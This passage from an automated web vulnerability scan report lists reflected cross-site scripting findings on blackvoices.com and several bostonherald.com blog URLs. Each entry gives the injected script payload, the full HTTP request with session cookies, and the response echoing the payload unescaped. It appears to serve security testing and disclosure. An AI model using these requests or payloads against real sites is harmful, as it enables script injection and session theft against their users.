4.772. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75dbe</script><script>alert(1)</script>1dc14cd4469 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video75dbe</script><script>alert(1)</script>1dc14cd4469 HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3240312844.2536784205.3338077184; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 28 Jan 2011 15:06:07 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31107
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm03 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video75dbe</script><script>alert(1)</script>1dc14cd4469";
s_265.linkInternalFilters="javascript:,aol.com,blackvoices.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

4.773. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4afcc"><script>alert(1)</script>d82b4897c0c was submitted in the REST URL parameter 5. This input was echoed as 4afcc\"><script>alert(1)</script>d82b4897c0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/entertainment/guestlisted/index.php/20114afcc"><script>alert(1)</script>d82b4897c0c/01/27/van-halen-recording-with-celine-dion-producer/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:09:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/entertainment/guestlisted/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:09:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/entertainment/guestlisted/index.php/20114afcc\"><script>alert(1)</script>d82b4897c0c/01/27/van-halen-recording-with-celine-dion-producer/">
...[SNIP]...

4.774. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70037"><script>alert(1)</script>7feba13b723 was submitted in the REST URL parameter 6. This input was echoed as 70037\"><script>alert(1)</script>7feba13b723 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/entertainment/guestlisted/index.php/2011/0170037"><script>alert(1)</script>7feba13b723/27/van-halen-recording-with-celine-dion-producer/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:10:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/entertainment/guestlisted/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:10:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/entertainment/guestlisted/index.php/2011/0170037\"><script>alert(1)</script>7feba13b723/27/van-halen-recording-with-celine-dion-producer/">
...[SNIP]...

4.775. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95c27"><script>alert(1)</script>81822d7f333 was submitted in the REST URL parameter 7. This input was echoed as 95c27\"><script>alert(1)</script>81822d7f333 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/entertainment/guestlisted/index.php/2011/01/2795c27"><script>alert(1)</script>81822d7f333/van-halen-recording-with-celine-dion-producer/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:10:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/entertainment/guestlisted/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:10:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/entertainment/guestlisted/index.php/2011/01/2795c27\"><script>alert(1)</script>81822d7f333/van-halen-recording-with-celine-dion-producer/">
...[SNIP]...

4.776. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3652"><script>alert(1)</script>947a9457054 was submitted in the REST URL parameter 8. This input was echoed as d3652\"><script>alert(1)</script>947a9457054 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producerd3652"><script>alert(1)</script>947a9457054/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:11:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/entertainment/guestlisted/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:10:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producerd3652\"><script>alert(1)</script>947a9457054/">
...[SNIP]...

4.777. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19ef4"><script>alert(1)</script>1dd41ef465f was submitted in the REST URL parameter 5. This input was echoed as 19ef4\"><script>alert(1)</script>1dd41ef465f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/news/lone_republican/index.php/201119ef4"><script>alert(1)</script>1dd41ef465f/01/26/cutting-the-state-police/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:07:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:07:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/news/lone_republican/index.php/201119ef4\"><script>alert(1)</script>1dd41ef465f/01/26/cutting-the-state-police/">
...[SNIP]...

4.778. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13dab"><script>alert(1)</script>b404e1442a7 was submitted in the REST URL parameter 6. This input was echoed as 13dab\"><script>alert(1)</script>b404e1442a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/news/lone_republican/index.php/2011/0113dab"><script>alert(1)</script>b404e1442a7/26/cutting-the-state-police/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:08:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:08:30 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/news/lone_republican/index.php/2011/0113dab\"><script>alert(1)</script>b404e1442a7/26/cutting-the-state-police/">
...[SNIP]...

4.779. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3824"><script>alert(1)</script>ec4b7781a2e was submitted in the REST URL parameter 7. This input was echoed as a3824\"><script>alert(1)</script>ec4b7781a2e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/news/lone_republican/index.php/2011/01/26a3824"><script>alert(1)</script>ec4b7781a2e/cutting-the-state-police/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:09:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:09:20 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/news/lone_republican/index.php/2011/01/26a3824\"><script>alert(1)</script>ec4b7781a2e/cutting-the-state-police/">
...[SNIP]...

4.780. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0bb1"><script>alert(1)</script>0c6338846da was submitted in the REST URL parameter 8. This input was echoed as d0bb1\"><script>alert(1)</script>0c6338846da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-policed0bb1"><script>alert(1)</script>0c6338846da/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:10:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/news/lone_republican/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:10:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<form id="searchform" method="get" action="/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-policed0bb1\"><script>alert(1)</script>0c6338846da/">
...[SNIP]...

4.781. http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2011/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/sports/rap_sheet/index.php/2011/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59440"><script>alert(1)</script>a90735c589b was submitted in the REST URL parameter 5. This input was echoed as 59440\"><script>alert(1)</script>a90735c589b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/sports/rap_sheet/index.php/201159440"><script>alert(1)</script>a90735c589b/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:01:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/rap_sheet/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 04:01:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 57634

